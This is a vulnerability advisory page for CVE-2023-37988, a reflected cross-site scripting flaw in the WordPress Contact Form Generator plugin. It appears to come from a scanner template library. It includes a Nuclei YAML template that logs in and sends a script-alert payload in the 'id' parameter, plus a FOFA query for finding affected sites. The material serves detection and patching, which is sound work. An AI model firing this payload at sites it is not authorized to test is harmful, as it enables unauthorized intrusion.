Contact Form Generator <= 2.5.5 - Cross-Site Scripting
CVE-2023-37988
Early Release
Description
The Contact Form Generator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'id' parameter in wp-admin/admin.php in versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
Severity
Medium
CVSS Score
6.1
Affected Product
contact-form-generator
Published Date
August 6, 2025
Template Author
0xr2r, vats147
CVE-2023-37988.yaml
id: CVE-2023-37988 info: name: Contact Form Generator <= 2.5.5 - Cross-Site Scripting author: 0xr2r,vats147 severity: medium description: | The Contact Form Generator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'id' parameter in wp-admin/admin.php in versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. remediation: | Update to plugin version 2.5.6 or later. reference: - https://packetstorm.news/files/id/174896 - https://nvd.nist.gov/vuln/detail/CVE-2023-37988 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-37988 cwe-id: CWE-79 cpe: cpe:2.3:a:creative-solutions:contact_form_generator:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: creative-solutions product: contact-form-generator fofa-query: body="/wp-content/plugins/contact-form-generator" tags: cve,cve2023,wordpress,wp,wp-plugin,xss,contact-form-generator,authenticated http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=contact_form_generator&id=1%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body_2 words: - "<script>alert(document.domain)</script>" - "contact_form_generator" condition: and - type: word part: content_type_2 words: - "text/html" - type: status status: - 200 # digest: 4a0a004730450221008d0597b2c94c39e58b6b0e88546e885d8f88cefec7a242625d3195d560d3424302200d24a7ec9c71ea57b03c10b30faff127256071998082f8693ab52808f1bc0d75:922c64590222798bb761d5b6d8e72950
6.1Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2023-37988
CWE ID:
cwe-79
Remediation Steps
Update to plugin version 2.5.6 or later.